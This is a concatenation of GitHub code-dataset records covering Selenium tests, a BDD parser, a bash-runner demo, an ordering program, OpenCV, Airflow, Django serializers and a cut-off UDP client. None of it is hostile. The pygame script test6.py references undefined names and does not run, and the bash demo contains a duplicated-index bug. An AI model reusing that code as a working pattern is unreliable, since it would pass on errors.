\"image\"]', \"XPATH\")\n browser.find_element_by_xpath('//button[text() = \"Next\"]').click()\n self.wait_until_element_present('//label[@for = \"shipping-single\"]', 'XPATH')\n\n def cp_select_shipping_payment(self,browser, paymentname):\n browser.find_element_by_xpath('//label[@for = \"shipping-single\"]').click()\n browser.find_element_by_xpath('//button[text() = \"Next\"]').click()\n self.wait_until_element_present(\"//select[@id='paymentMethod']/option[text()='\"+paymentname+\"']\", \"XPATH\").click()\n self.find_element_by_css_selector('.Field_custom_name input')\n self.execute_script(\"$('.Field_custom_name input').val('\"+paymentname+\"');\")\n browser.find_element_by_xpath('//button[@class = \"btn btn-primary orderMachineSaveButton orderSaveButton\"]').click()\n\n def create_order_controlpanel(self,browser, email, password, firstname, lastname,company,phone,street_add1,street_add2,city,country,state,postcode, invalid_email,invalid_pwd):\n element = self.wait_until_element_present('Orders', \"LINK\")\n element.click()\n browser.find_element_by_link_text('Add an Order').click()\n element = self.wait_until_element_present('//label[@for = \"check-new-customer\"]', \"XPATH\")\n element.click()\n #Validation for Invalid Email\n browser.find_element_by_id('FormField_1').send_keys(invalid_email)\n browser.find_element_by_xpath('//button[text() = \"Next\"]').click()\n assert \"Please enter a valid email address such as joe@example.com\" in browser.find_element_by_xpath('//div[@class = \"dialog-content\"]/p').text\n browser.find_element_by_css_selector('#display-modal .btn-primary').click()\n browser.find_element_by_id('FormField_1').clear()\n browser.find_element_by_id('FormField_1').send_keys(email)\n #Validation for Invalid Password\n browser.find_element_by_id('FormField_2').send_keys(invalid_pwd)\n browser.find_element_by_xpath('//button[text() = \"Next\"]').click()\n assert \"The password and confirmed password do not match.\" in browser.find_element_by_xpath('//div[@class = \"dialog-content\"]/p').text\n browser.find_element_by_css_selector('#display-modal .btn-primary').click()\n browser.find_element_by_id('FormField_2').clear()\n browser.find_element_by_id('FormField_2').send_keys(password)\n browser.find_element_by_id('FormField_3').send_keys(password)\n self.select_dropdown_value(browser, 'accountCustomerGroup', '-- Do not assign to any group --')\n browser.find_element_by_id('FormField_4').send_keys(firstname)\n browser.find_element_by_id('FormField_5').send_keys(lastname)\n browser.find_element_by_id('FormField_6').send_keys(company)\n browser.find_element_by_id('FormField_7').send_keys(phone)\n browser.find_element_by_id('FormField_8').send_keys(street_add1)\n browser.find_element_by_id('FormField_9').send_keys(street_add2)\n browser.find_element_by_id('FormField_10').send_keys(city)\n self.select_dropdown_value(browser, 'FormField_11', country)\n self.select_dropdown_value(browser, 'FormField_12', state)\n self.clear_field(browser,'FormField_13')\n browser.find_element_by_id('FormField_13').send_keys(postcode)\n browser.find_element_by_xpath('//button[text() = \"Next\"]').click()\n #Add an Item\n self.cp_add_order_item(browser,'[Sample] Anna, bright single bangles')\n # Select Shipping address and Payment method\n self.cp_select_shipping_payment(browser, 'Manual Payment')\n\n # Verify and Assert the success message\n browser_success_msg = self.wait_until_element_present('.alert-success', 'CSS_SELECTOR').text\n order_success_msg=\"Order #%s has been created successfully.\" % browser_success_msg[7:10]\n orderID = self.get_order_number(browser)\n\n assert order_success_msg in browser_success_msg\n return orderID\n","repo_name":"testing-sravan/tests-scripts-worked","sub_path":"Regression_suite_bigc/lib/order_class.py","file_name":"order_class.py","file_ext":"py","file_size_in_byte":8725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"75139715881","text":"from parse import compile\r\n\r\n\r\nclass StepTable:\r\n \"\"\"Step table parser utility class\"\"\"\r\n KEY_TEXT = 'key'\r\n EMPTY_TEXT = ''\r\n VALUE_TEXT = 'value'\r\n NESTED_KEY_TEXT = 'nested_key'\r\n EMPTY_DOUBLE_QUOTES = '\"\"'\r\n NEW_LINE_CHARACTER = '\\n'\r\n LESS_THAN_CHARACTER = '<'\r\n GREATER_THAN_CHARACTER = '>'\r\n key_value_schema = compile('|{key:^w}|{value:^}|')\r\n nested_key_value_schema = compile('|{key:^w}|{nested_key:^}|{value:^}|')\r\n\r\n @staticmethod\r\n def parse_step_table(step_table: str):\r\n \"\"\"Parse static step table\r\n\r\n Note:\r\n Empty key is not accepted, will raise Exception\r\n Key value mapping with empty value will be ignored\r\n \"\"\"\r\n table_dict = {}\r\n for line in step_table.split(StepTable.NEW_LINE_CHARACTER):\r\n if line == StepTable.EMPTY_TEXT:\r\n break\r\n result = StepTable.key_value_schema.parse(line)\r\n if result is None:\r\n raise Exception('Step Error: Unable to parse step table')\r\n else:\r\n if result.named[StepTable.VALUE_TEXT].strip() == StepTable.EMPTY_TEXT:\r\n continue\r\n table_dict.update({\r\n result.named.get(StepTable.KEY_TEXT): result.named.get(StepTable.VALUE_TEXT)\r\n })\r\n return table_dict\r\n\r\n @staticmethod\r\n def parse_nested_key_step_table(step_table: str):\r\n \"\"\"Parse static nested step table\r\n\r\n Note:\r\n Empty key is not accepted, will raise Exception\r\n If empty value, simple or nested key value be ignored\r\n \"\"\"\r\n table_dict = {}\r\n for line in step_table.split(StepTable.NEW_LINE_CHARACTER):\r\n result = StepTable.nested_key_value_schema.parse(line)\r\n if result is None:\r\n raise Exception('Step Error: Unable to parse nested step table')\r\n else:\r\n if result.named[StepTable.VALUE_TEXT].strip() == StepTable.EMPTY_TEXT:\r\n continue\r\n elif result.named[StepTable.NESTED_KEY_TEXT].strip() == StepTable.EMPTY_TEXT:\r\n table_dict.update({\r\n result.named.get(StepTable.KEY_TEXT): result.named.get(StepTable.VALUE_TEXT)\r\n })\r\n else:\r\n table_dict.update({\r\n result.named.get(StepTable.KEY_TEXT):\r\n {result.named.get(StepTable.NESTED_KEY_TEXT): result.named.get(StepTable.VALUE_TEXT)}\r\n })\r\n return table_dict\r\n\r\n @staticmethod\r\n def parse_step_table_example_value(request, table_dict):\r\n \"\"\"Parse step table example value\"\"\"\r\n return {key: StepTable.get_value(request, value) for key, value in table_dict.items()}\r\n\r\n @staticmethod\r\n def get_value(request, argument):\r\n \"\"\"Get fixture value from BDD examples\"\"\"\r\n if argument[0] == StepTable.LESS_THAN_CHARACTER and argument[-1] == StepTable.GREATER_THAN_CHARACTER:\r\n value = request.getfixturevalue(argument[1:-1])\r\n return None if value == StepTable.EMPTY_TEXT else value\r\n return None if argument == StepTable.EMPTY_DOUBLE_QUOTES else argument\r\n","repo_name":"kr87nikhil/python-bdd","sub_path":"utility/parse_steps.py","file_name":"parse_steps.py","file_ext":"py","file_size_in_byte":3267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"36982475426","text":"\"\"\"Script to test execution of bash scripts, gathering\n the results, combining them and saving them.\n\n\t @author 'Pat Barton'\t \n\"\"\"\n\n\n\n\"\"\"This demo is simple, but shows all the key steps required to integrate\n existing bash scripts with you python codes.\n\n Exactly what the bash scripts do is not important so we'll \n spin up some trivial ones. We'll just make some up. For\n\t demo purposes all will do the same thing - return the names\n\t of files (ls/dir command) - from their directories.\n\n We'll create different directories for each of three bash scripts\n and populate the directories with files named so we know where\n\t they camre from.\n\n\tAll this happens in setup_scratch_dirs() - not that all this functionality\n\t is isolated from the rest of the code. That way it'll be easy to substitute\n\t \"real\" bash scripts from your own directories. Note the use of \n\t tempfile.mkdtemp() - this writes a scratch directory somewhere safe. Note\n\t also that we're exercising good manners by cleaning up the mess using\n\t shutil.rmtree.\n\n\t=======\n\tThe bash files will go out into the world and do something. All this functionality\n\t is handled in run_scripts(). Note, again, the isolated functionality - this makes things\n\t easy to maintain. We run the scripts and capture their output with the \n\t subprocess.check_output() method.\n\n\t===\n\tAt the end of the day we want to do something with the output. That's all handled in\n\t the process_output() function. Naturally, you'll want to \"roll your own\" here, but you \n\t know where to put it.\n\n\t===\n\tThe global namespace of the module is uncluttered. The bit at the top wrangles the \n\t imports and makes sure we remember the original directory. The bit at the bottom\n\t cleans things up and ensures that we leave the working directory right where we found it.\n\"\"\"\n\nimport tempfile\nimport os\nimport shutil\nimport subprocess\n\nNUM_SCRIPTS = 3\n\n#make a temp dir and switch into it.\norig_dir = os.getcwd() #remember original dir\ntemp_dir = tempfile.mkdtemp() #returns name of new dir\nos.chdir(temp_dir) #switch to temp dir\n\ndef setup_scratch_dirs():\n \"\"\"This routine makes subdirectories in scratch folder. Each\n gets populated with a few empty files and its own bash script.\n So it'll look like:\n scratch\\\n subdir0\\\n \t subdir0_file0\n \t\t subdir0_file1\n \t\t subdir0_file2\n \t\t script0.sh\n \tThe script file just contains the command 'ls' and will list the\n \tfiles in its subdir (makes output easy to check)\n\n \tA list of the script files is returned.\n \"\"\"\t\t \n scrip_paths=[]\n for s in range(NUM_SCRIPTS):\n subname = \"subdir\" + str(s)\n sub = os.mkdir(subname) #make sudirs named 'subdir0', etc.\n os.chdir(subname) #switch to subdir\n for f in range(5): \n filename = \"subdir\" + str(s) + \"_file\" + str(f)\n open(filename, 'w').close()\n\n #create a script file and a file handler\n scriptname = 'script' + str(s) + \".sh\"\n scrip_paths.append(os.path.join(os.getcwd(), scriptname))\n with open(scriptname, 'w') as script:\n script.write(\"#! /bin/bash\\n\")\n script.write(\"ls\\n\") #lists contents of the director\n\n os.chmod(scriptname, 0o777) #let anyone do anything with the script\n\n os.chdir('..') #switch to scratch dir\n\n return scrip_paths\n\ndef run_scripts(scripts):\n \"\"\"Expects an iterable object (list, tuple, etc.) containing\n fully-specified path to script file. Runs each script, \n captures the output, and does something with the output.\n\n The subprocess module has tons of options. You can read\n all about them here:\n\n https://docs.python.org/3/library/subprocess.html\n\n Output is stored in a list, one element for each script,\n and returned.\n\n \"\"\"\n output_list=[]\n for index, s in enumerate(scripts):\n #split path name from script name\n sdir, sname = os.path.split(s) \n #run the script using its dir as the cwd, capture output\n os.chdir(sdir)\n output = subprocess.check_output(s)\n output_list.append(output)\n return output_list\n\n\n\ndef process_output(output):\n \"\"\"Does something with the output, which enters this function\n as a list. Do anything you want here, I'm just having fun\"\"\"\n\n for i in range(len(output)):\n \"this makes a list from the return of a ls from linux\"\n output[i] = output[i].split()\n\n stg = \"{} HealthCheckPassed \\n\\t{} INROTATION \\n\\t{} STATUSCODE\"\t\n for result0, result1, result2 in zip(output[0], output[1], output[1]):\n print(stg.format(result0, result1, result2))\n\n\nscripts = setup_scratch_dirs()\t\noutput = run_scripts(scripts)\nprocess_output(output)\n\nos.chdir(orig_dir)\nshutil.rmtree(temp_dir)\t\n\n\n","repo_name":"pbarton666/learninglab","sub_path":"experimental/py_run_bash_scripts.py","file_name":"py_run_bash_scripts.py","file_ext":"py","file_size_in_byte":4871,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"73432611881","text":"# 点菜小程序\nmenu_list = [ \"糖醋排骨\",\"水煮鱼\",\"大盘鸡\",\"拌黄瓜\",\"萝卜炒肉\",\"土豆丝\"] # 菜品目录\nprice = [48, 58,38, 12 , 45 ,15 ] # 菜品价格\norder_price = 0 # 菜品单价\norder_list = [] # 已点菜品\ncount = 0 # 计算总价\nk = 0 # 餐品数目\nn = 0\nseat_list = [2,2,2,4,4,4,6,6,6] # 每桌的座位数\nsitdown_list = [] # 存放已经被坐了的座位号\nguest_list =[] # 存放就餐人数量\nprint(\"**************欢迎光临大连工业大学小菜馆**************\")\nx = int(input(\"请问您几位: \"))\nguest_list.append(x)\nfor y in seat_list:\n n += 1\n if y >= x:\n sitdown_list.append(seat_list.index(y))\n seat_list.remove(y)\n print(\"您的座位是{}号桌\".format(sitdown_list))\n break\nif n != seat_list.index(y) + 1:\n print(\"对不起,本餐厅没有合适的座位。\")\nelse:\n print(\"请您参考下列菜单菜品价格进行点菜\")\n print(\"Python 365 菜品\\n\",menu_list)\n print(\"Python 365 菜单价格\\n\",price)\n print(\"***************如完成点菜请输入N,如需要取消已点菜品请输入C***************\")\n server = input('请输入菜品进行点餐: ')\n def order_1(menu_list, order_list,server1):\n order_list.append(server1)\n print('已经点购菜名:{}'.format(order_list))\n a = menu_list.index(server1)\n return(a)\n while ( server != 'N'):\n if (server != 'C'):\n k+=1\n order_price = order_1(menu_list, order_list, server)\n print(\"***************如完成点菜请输入N,如需要取消已点菜品请输入C***************\")\n server = input('请输入菜品进行点餐: ')\n count += price[order_price]\n else:\n if (k==0):\n print(\"!!!您还未点任何菜品!!!\")\n server = input('请输入菜品进行点餐: ')\n else:\n cancle = input('请输入要取消的菜品: ')\n b = menu_list.index(cancle)\n order_list.remove(cancle)\n count -= price[b]\n k -=1\n print(\"***************如完成点菜请输入N,如需要取消已点菜品请输入C***************\")\n server = input('请输入菜品进行点餐: ')\n print(\"一共点了{0}道菜品,共计{1}元\".format(k,count))\n while True:\n fee = float(input(\"您支付的金额是:\"))\n if float(fee) < float(count):\n print(\"***************您支付的金额不足***************\")\n continue\n else:\n print(\"您支付了{}元,找您{}元\".format(count, fee - count))\n break","repo_name":"Bryson582/Python_365","sub_path":"ordermeal.py","file_name":"ordermeal.py","file_ext":"py","file_size_in_byte":2672,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"933276943","text":"import numpy as np\nimport cv2\n\nimage = cv2.imread(\"images/dog.jpg\", cv2.IMREAD_GRAYSCALE)\nif image is None:\n raise Exception(\"영상파일 읽기 오류\")\n\n\n# SoG 연산\ngaus = cv2.GaussianBlur(image, (7, 7), 0, 0) # 가우스마스크 적용\ndst1 = cv2.Laplacian(gaus, cv2.CV_16S, 7) # 라플라시안 수행\n\n# DoG 연산\ngaus1 = cv2.GaussianBlur(image, (3, 3), 0)\ngaus2 = cv2.GaussianBlur(image, (9, 9), 0)\ndst2 = gaus1 - gaus2\n\ncv2.imshow(\"image\", image)\ncv2.imshow(\"dst1- LoG\", dst1.astype('uint8'))\ncv2.imshow(\"dst2- DoG\", dst2)\ncv2.waitKey(0)\n","repo_name":"yujongyeop/image-processing","sub_path":"week07/edge_DOG.py","file_name":"edge_DOG.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"31916048729","text":"# 九章的python代码,这里体现了python中栈操作的便利性。\n# http://www.jiuzhang.com/solutions/binary-tree-zigzag-level-order-traversal/\nfrom lintcode import TreeNode\n\"\"\"\nDefinition of TreeNode:\nclass TreeNode:\n def __init__(self, val):\n this.val = val\n this.left, this.right = None, None\n\"\"\"\n\n\nclass Solution:\n \"\"\"\n @param root: The root of binary tree.\n @return: A list of list of integer include \n the zig zag level order traversal of its nodes' values\n \"\"\"\n def preorder(self, root, level, res):\n if root:\n if len(res) < level+1: res.append([])\n if level % 2 == 0: \n res[level].append(root.val)\n else: \n res[level].insert(0, root.val)\n self.preorder(root.left, level+1, res)\n self.preorder(root.right, level+1, res)\n def zigzagLevelOrder(self, root):\n self.results = []\n self.preorder(root, 0, self.results)\n return self.results","repo_name":"XingxingHuang/Leetcode-for-Fun","sub_path":"lintcode/lintcode_071_Binary_tree_Zigzag_Level_Order_Traversal.py","file_name":"lintcode_071_Binary_tree_Zigzag_Level_Order_Traversal.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"18"} +{"seq_id":"86642291565","text":"import pandas as pd\nimport numpy as np\nimport pickle\nfrom datetime import datetime\nfrom airflow import DAG\nfrom airflow.operators.bash import BashOperator\nfrom airflow.operators.python import PythonOperator\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.svm import SVC\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.metrics import f1_score\n\n\ndef _prepare_dataset():\n dataset = pd.read_csv('~/airflow-docker/downloads/dataset_diabetes/diabetic_data.csv')\n dataset = dataset.drop(['encounter_id', 'patient_nbr'], axis=1)\n dataset = dataset.replace(to_replace='?', value=np.NaN)\n dataset = dataset.dropna(axis=1)\n dataset = _labels_to_numbers(dataset, 'readmitted')\n dataset = pd.get_dummies(dataset, drop_first=True)\n dataset = _balance_dataset(dataset, 'readmitted')\n dataset.to_csv('~/airflow-docker/downloads/clean_dataset.csv', index=False)\n\ndef _labels_to_numbers(dataset, column):\n labels = dataset[column].unique()\n num_labels = len(labels)\n label_dict = dict(zip(labels, range(0, num_labels)))\n numerical_labels = dataset[column].map(label_dict)\n return dataset.assign(**{column: numerical_labels})\n\ndef _balance_dataset(dataset, target_column):\n value_counts = dataset[target_column].value_counts()\n min_count = min(value_counts)\n return dataset.groupby(target_column).sample(n=min_count, random_state=42)\n\ndef _get_model_score(filepath, target_column, model):\n X, y = _split_dataset(filepath, target_column)\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=42)\n model.fit(X_train, y_train)\n y_pred = model.predict(X_test)\n return f1_score(y_test, y_pred, average='macro')\n\ndef _split_dataset(filepath, target_column):\n dataset = pd.read_csv(filepath)\n X = dataset.drop(target_column, axis=1)\n y = dataset[target_column]\n return X, y\n\ndef _train_best_model(ti, filepath, target_column):\n scores = ti.xcom_pull(task_ids=[\n 'get_svc_score',\n 'get_knn_score',\n 'get_rfc_score'\n ])\n\n model, model_name = _select_best_model(scores)\n X, y = _split_dataset(filepath, target_column)\n model.fit(X, y)\n with open(f'/home/joshua/airflow-docker/downloads/{model_name}_model.pk', 'wb') as f:\n pickle.dump(model, f)\n \n return max(scores)\n\ndef _select_best_model(scores):\n best_model = np.argmax(np.array(scores))\n if best_model == 0:\n return SVC(), 'svc'\n elif best_model == 1:\n return KNeighborsClassifier(), 'knn'\n else:\n return RandomForestClassifier(), 'rfc'\n\n\nwith DAG(\n dag_id='ml_pipeline',\n schedule_interval='@monthly',\n start_date=datetime(2022, 1, 1),\n catchup=False\n) as dag:\n\n download_dataset = BashOperator(\n task_id='download_dataset',\n bash_command='curl -o ~/airflow-docker/downloads/dataset_diabetes.zip https://archive.ics.uci.edu/ml/machine-learning-databases/00296/dataset_diabetes.zip'\n )\n\n unzip_dataset = BashOperator(\n task_id='unzip_dataset',\n bash_command='unzip ~/airflow-docker/downloads/dataset_diabetes.zip -d ~/airflow-docker/downloads/'\n )\n\n prepare_dataset = PythonOperator(\n task_id='prepare_dataset',\n python_callable=_prepare_dataset\n )\n\n get_svc_score = PythonOperator(\n task_id='get_svc_score',\n python_callable=_get_model_score,\n op_kwargs={\n 'filepath': '~/airflow-docker/downloads/clean_dataset.csv', \n 'target_column': 'readmitted', \n 'model': SVC()}\n )\n\n get_knn_score = PythonOperator(\n task_id='get_knn_score',\n python_callable=_get_model_score,\n op_kwargs={\n 'filepath': '~/airflow-docker/downloads/clean_dataset.csv', \n 'target_column': 'readmitted', \n 'model': KNeighborsClassifier()}\n )\n\n get_rfc_score = PythonOperator(\n task_id='get_rfc_score',\n python_callable=_get_model_score,\n op_kwargs={\n 'filepath': '~/airflow-docker/downloads/clean_dataset.csv', \n 'target_column': 'readmitted', \n 'model': RandomForestClassifier()}\n )\n\n train_best_model = PythonOperator(\n task_id='train_best_model',\n python_callable=_train_best_model,\n op_kwargs={\n 'filepath': '~/airflow-docker/downloads/clean_dataset.csv', \n 'target_column': 'readmitted'\n }\n )\n\n download_dataset >> unzip_dataset >> prepare_dataset >> [get_svc_score, get_knn_score, get_rfc_score] >> train_best_model\n ","repo_name":"chiny-jc/airflow-workflows","sub_path":"ml_pipeline.py","file_name":"ml_pipeline.py","file_ext":"py","file_size_in_byte":4613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"10535767251","text":"################\n# közelítős animáció kép pacával\n\nimport random\nimport pygame as pg\nimport numpy as np\n\nrandom.seed()\n\nWIDTH, HEIGHT = 1550, 800\n\nWIN = pg.display.set_mode((WIDTH, HEIGHT))\n\nBACKGROUND = (128, 220, 12)\n\nFPS = 50\n\nx, y, x1, y1 = 0, HEIGHT / 2, WIDTH / 2, HEIGHT / 2\nu, v, u1, v1 = 0, 0, 0, 0\ndiff = (x1 - x, y1 - y)\nprint(diff[0], diff[1])\n\n\ndef update(x, y, u, v, x1, y1, u1, v1, phase):\n global diff\n if phase == 1:\n f = np.sqrt(diff[0] ** 2 + diff[1] ** 2)\n if f > 30:\n x += u\n y += v\n else:\n phase = 2\n if phase == 2:\n u, v = v, -u\n x += u\n y += v\n u, v = np.co * u - np.si * v, np.si * u, np.co * v\n return x, y, u, v, x1, y1, u1, v1\n\ndef draw_window(x, y, u, v, x1, y1, u1, v1, phase):\n WIN.fill(BACKGROUND)\n x, y, u, v, x1, y1, u1, v1 = update(x, y, u, v, x1, y1, u1, v1, phase)\n pg.draw.rect(WIN, (255, 255, 0), ((RADIUS, RADIUS), (WIDTH - 2 * RADIUS, HEIGHT - 2 * RADIUS)), width=0)\n pg.draw.circle(WIN, (0, 0, 0), (x, y), width=0, radius=20)\n pg.draw.circle(WIN, (0, 0, 255), (x1, y1), width=0, radius=20)\n pg.display.update()\n return x, y, u, v, x1, y1, u1, v1\n\n\ndef main():\n clock = pg.time.Clock()\n run = True\n phase = 1\n f = np.sqrt(diff[0] ** 2 + diff[1] ** 2)\n len = 5\n alpha = np.pi / 20\n si = np.sin(alpha)\n co = np.cos(alpha)\n u = 5 * diff[0] / f\n v = 0 * diff[1] / f\n\n while run:\n clock.tick(FPS)\n for event in pg.event.get():\n if event.type == pg.QUIT:\n run = False\n x, y, u, v, x1, y1, u1, v1 = draw_window(x, y, u, v, x1, y1, u1, v1, phase)\n pg.quit()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"egyszem/emotion_through_motions","sub_path":"test6.py","file_name":"test6.py","file_ext":"py","file_size_in_byte":1727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"24424431101","text":"# Actualizado por:\n# Yeimmy Katherin Lugo \n# 07/06/2023\n\n\nfrom rest_framework import serializers\nfrom .models import Devices, Project, Template, DatosSensores, SharedProject, graphics\n\n\n\n# class SharedProjectValidationSerializer(serializers.Serializer):\n# idrandom = serializers.CharField()\n\n# def validate_idrandom(self, value):\n# try:\n# project = Project.objects.get(idrandom=value)\n# except Project.DoesNotExist:\n# raise serializers.ValidationError(\"Invalid idrandom\")\n# return value\n\nclass SharedRelationSerializer(serializers.ModelSerializer):\n id = serializers.IntegerField(read_only=True) # Campo de solo lectura para el ID\n\n class Meta:\n model = SharedProject\n fields = ['id', 'user', 'project', 'timestamp']\n # Define los campos que se serializarán/deserializarán y se incluirán en la representación del objeto\n\n \nclass ShareProjectSerializer(serializers.Serializer):\n idrandom = serializers.CharField(max_length=300) # Campo de cadena de caracteres con una longitud máxima de 300 caracteres\n # Define el campo \"idrandom\" que se serializará/deserializará\n\n \nclass ProjectSerializer(serializers.ModelSerializer):\n relationUserProject = serializers.ReadOnlyField(source='relationUserProject.username')\n # Define un campo de solo lectura \"relationUserProject\" que obtiene el nombre de usuario del campo \"relationUserProject\" del objeto relacionado\n\n class Meta:\n model = Project\n fields = ['id', 'idrandom', 'name', 'location', 'description', 'relationUserProject']\n # Define los campos que se serializarán/deserializarán y se incluirán en la representación del objeto\n read_only_fields = ['id']\n # Define los campos que serán de solo lectura en la deserialización (es decir, no se permitirá actualizarlos mediante la API)\n\n def create(self, validated_data):\n # Obtenemos el usuario autenticado de la solicitud\n user = self.context[\"request\"].user\n # Establecemos el valor de relationUserProject en el usuario autenticado\n validated_data[\"relationUserProject\"] = user\n # Creamos el objeto Project usando los datos validados actualizados\n project = Project.objects.create(**validated_data)\n return project\n\nclass DevicesSerializer(serializers.ModelSerializer):\n relationProject = serializers.PrimaryKeyRelatedField(queryset=Project.objects.all(), default=serializers.CurrentUserDefault())\n # Utilizamos el campo PrimaryKeyRelatedField para obtener el ID del proyecto en lugar del nombre\n class Meta:\n model = Devices\n # Asocia el serializador al modelo \"Devices\"\n fields = [\n \"id\", # Campo de identificación del dispositivo\n \"name\", # Campo de nombre del dispositivo\n \"location\",# Campo de ubicación del dispositivo\n \"template\",\n \"relationProject\", # Campo de relación con el usuario propietario del dispositivo\n ]\n read_only_fields = ['id']\n # Define los campos que serán de solo lectura en la deserialización (es decir, no se permitirá actualizarlos mediante la API)\n\n \n def create(self, validated_data):\n project_id = self.context['request'].parser_context['kwargs']['project_id']\n project = Project.objects.get(id=project_id)\n validated_data.pop('relationProject')\n device = Devices.objects.create(relationProject=project, **validated_data)\n return device\n \n \nclass TemplateSerializer(serializers.ModelSerializer):\n relationUserTemplate = serializers.ReadOnlyField(source='relationUserTemplate.username')\n # Define un campo de solo lectura \"relationUserTemplate\" que obtiene el nombre de usuario del campo \"relationUserTemplate\" del objeto relacionado\n\n class Meta:\n model = Template\n # Asocia el serializador al modelo \"Template\"\n fields = [\n \"id\", # Campo de identificación de la plantilla\n \"name\", # Campo de nombre de la plantilla\n \"sensor\", # Campo de sensor asociado a la plantilla\n \"red\", # Campo de red asociada a la plantilla\n \"descripcion\", # Campo de descripción de la plantilla\n \"relationUserTemplate\", # Campo de relación con el usuario propietario de la plantilla\n ]\n read_only_fields = ['id']\n # Define los campos que serán de solo lectura en la deserialización (es decir, no se permitirá actualizarlos mediante la API)\n\n def create(self, validated_data):\n # Obtenemos el usuario autenticado de la solicitud\n user = self.context[\"request\"].user\n # Establecemos el valor de relationUserDevice en el usuario autenticado\n validated_data[\"relationUserTemplate\"] = user\n # Creamos el objeto relationUserDevice usando los datos validados actualizados\n template = Template.objects.create(**validated_data)\n return template\n \nclass TemplateSerializerShared(serializers.ModelSerializer):\n relationUserTemplate = serializers.ReadOnlyField(source='relationUserTemplate.username')\n # Define un campo de solo lectura \"relationUserTemplate\" que obtiene el nombre de usuario del campo \"relationUserTemplate\" del objeto relacionado\n class Meta:\n model = Template\n # Asocia el serializador al modelo \"Template\"\n fields = [\n \"id\", # Campo de identificación de la plantilla\n \"name\", # Campo de nombre de la plantilla\n \"sensor\", # Campo de sensor asociado a la plantilla\n \"red\", # Campo de red asociada a la plantilla\n \"descripcion\", # Campo de descripción de la plantilla\n \"relationUserTemplate\", # Campo de relación con el usuario propietario de la plantilla\n ]\n read_only_fields = ['id']\n # Define los campos que serán de solo lectura en la deserialización (es decir, no se permitirá actualizarlos mediante la API)\n\n\n \n \n \nclass DatosSensoresSerializer(serializers.ModelSerializer):\n relationTemplatePin = serializers.PrimaryKeyRelatedField(read_only=True)\n\n class Meta:\n model = DatosSensores\n fields = ['name', 'created_at', 'v1', 'v2', 'v3', 'v4', 'v5', 'v6', 'v7', 'v8', 'v9', 'v10', 'v11', 'v12', 'relationTemplatePin']\n read_only_fields = ['name', 'created_at', 'v1', 'v2', 'v3', 'v4', 'v5', 'v6', 'v7', 'v8', 'v9', 'v10', 'v11', 'v12', 'relationTemplatePin']\n \n def create(self, validated_data):\n template_id = self.context['request'].parser_context['kwargs']['id']\n template = Template.objects.get(id=template_id)\n validated_data.pop('relationTemplatePin') # Eliminar la clave 'relationTemplateGraphics'\n sensores = DatosSensores.objects.create(relationTemplatePin=template, **validated_data)\n return sensores\n\nclass GraphicsSerializer(serializers.ModelSerializer):\n relationTemplateGraphics = serializers.PrimaryKeyRelatedField(queryset=Template.objects.all(), default=serializers.CurrentUserDefault())\n\n class Meta:\n model = graphics\n fields = [\n \"id\",\n \"titlegraphics\",\n \"namegraphics\",\n \"aliasgraphics\",\n \"location\",\n \"is_circular\",\n \"color\",\n \"ports\",\n \"size_increase\", \n \"size_decrease\",\n \"relationTemplateGraphics\",\n ]\n read_only_fields = ['id']\n\n def create(self, validated_data):\n template_id = self.context['request'].parser_context['kwargs']['id']\n template = Template.objects.get(id=template_id)\n validated_data.pop('relationTemplateGraphics') # Eliminar la clave 'relationTemplateGraphics'\n graphicsx = graphics.objects.create(relationTemplateGraphics=template, **validated_data)\n return graphicsx\n\n\n","repo_name":"PIANTAIOT/Pianta---IOT---Backend-","sub_path":"Pianta/Project_Api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":7900,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"6402881010","text":"import socket\nimport os\nimport sys\n\n\n#function that asks the user for what it wants to do and returns an integer.\n#It returns the command if a valid command if a valid command has been\n#requested, otherwise it returns 0.\ndef inputReceiver():\n print(\"1) get the list of file in the server\")\n print(\"2) get the contents of a file from the server\")\n print(\"3) upload a file on the server\")\n print(\"4) exit\")\n command = input(\"Input a valid command[1/2/3/4]: \")\n if(command.isnumeric()):\n command = int(command)\n if command == 1 or command == 2 or command == 3 or command == 4:\n return command\n else:\n return 0\n else :\n return 0\n\n\n#initialize socket\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\n#set server address\nserver_address = (\"localhost\", 12000)\n\n#starting main continious loop, which controlls the UPD communications with the server\nwhile True:\n\n #waitingForCommand will be used to ask the user for a valid command until one is entered\n waitingForCommand = True\n\n #while loop askd for user to input a valid command until it is entered\n while waitingForCommand:\n commandRequested = int(inputReceiver())\n \n if commandRequested != 0:\n print(\"command accepted\")\n waitingForCommand = False\n else :\n print(\"command not acceptable\")\n\n #incapsulating in a try to catch any exeptions\n try:\n \n if commandRequested == 1:\n\n #sending the request of the list message to the server\n message = \"get list\"\n sock.sendto(message.encode(), server_address)\n\n #receiving the list from the server. the first word is the number of files in the list, then the filenames are listed\n data, server = sock.recvfrom(4096)\n data = data.decode()\n\n #checking if the server sent a valid answer\n if data.isdigit():\n\n #printing the number of files\n print(\"there are \" + str(data) + \" files on the server\")\n\n #waiting for server to send the list of files\n data, server = sock.recvfrom(4096)\n data = data.decode()\n\n #printing the filenames\n print(str(data))\n\n #printing the error message of the server, if the awnswer wasn't valid\n else:\n print(\"an error has occured on the server.\")\n print(data)\n\n elif commandRequested == 2:\n\n #requesting the filename of the file the user wants to download\n fileName = input(\"input the name of the file you want to download: \")\n\n #sending the 